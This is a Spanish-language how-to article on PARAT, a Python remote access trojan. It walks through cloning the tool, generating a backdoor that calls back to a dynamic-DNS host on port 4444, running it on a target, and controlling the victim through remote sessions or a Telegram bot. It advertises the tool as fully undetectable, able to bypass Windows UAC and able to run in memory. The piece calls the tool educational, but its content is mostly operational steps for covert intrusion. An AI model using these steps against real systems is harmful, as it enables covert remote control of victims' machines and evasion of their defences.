Como usar PARAT- Remote Access Trojan (RAT)?
De acuerdo con especialistas en seguridad informática; un Troyano de Acceso Remoto (RAT) es un tipo de malware que controla un sistema a través de una conexión de red remota como por acceso físico. Si bien el uso compartido de escritorio y la administración remota tienen muchos usos legales, RAT generalmente se asocia con actividad criminal. Una RAT se instala sin que la víctima lo sepa y tratará de ocultar su operación a la víctima y al software de Anti Virus
PARAT es una herramienta de administración remota basada en Python y socket abierto con múltiples hilos. Utiliza principalmente Python core y usa IPv4 para comunicación y autocifrado local y remoto para su privacidad.
PARAT tiene dos intérpretes:
Modo local
Modo remoto
Cuando inicias el PARAT usando Python2 main.py, te redirigen al modo local y allí puedes:
Controlar opciones locales, cambiar elementos de UI, hacer ediciones, usar shell unix, establecer puertos de escucha y generar una puerta trasera, por mencionar algunos, no debemos olvidar que algunos comandos locales están disponibles en modo remoto.
Puede acceder al modo remoto solo cuando tiene conexiones conectadas, usando session -c ID reemplazando el ID con un identificador de objetivos. Aquí el experto en seguridad cibernética, tiene acceso completo a la máquina de destino y también puede realizar acciones remotas.
También puede establecer la contraseña local para el cliente PARAT y las conexiones remotas usar el algoritmo de cifrado automáticamente.
Aunque existen diferentes y mejores opciones para manejar la multiplicidad, deciden usar el módulo de enhebrado para hacer esto. La razón de esta elección es que PARAT es una herramienta simple y diseñada solo para fines educativos. Dejan de usar instrumentos más sofisticados en ese aspecto. También es necesario señalar que puede escuchar puertos diferentes al mismo tiempo utilizando esta función.
Solo haz estos pasos:
Entran al menú principal de PARAT usando Python2 main.py
Hacer que el uso de la puerta trasera generate -i yourhost.ddns.net -p 4444 -o backdoor.pyw
Ejecutar backdoor.pyw en el objetivo
Jugar con el objetivo en modo remoto, usando sesiones -c 1
También escucha en el puerto usando listen -p your_port
Change log:
Compatible con las versiones de Python 2 y 3 Copie y pegue en su terminal:
git clone https://github.com/micle-fm/Parat&& cd Parat && python main.py
Puede necesitar instalar python -m easy_install pypiwin32 en algunos destinos.
Características
Totalmente indetectable (FUD)
Compatible con Telegram Messenger
Windows Bypass Control de cuenta de usuario (UAC)
Ejecución de memoria
No hay requisitos para configurar
Telegram
Puede comunicar PARAT usando telegram messanger. Para esto haz los pasos:
Abra el archivo telegram.service en un editor
Inserta tu token de bot en la línea 15, reemplazado en YOUR_BOT_TOKEN
Ejecute telegram.service escribiendo: python telegram.service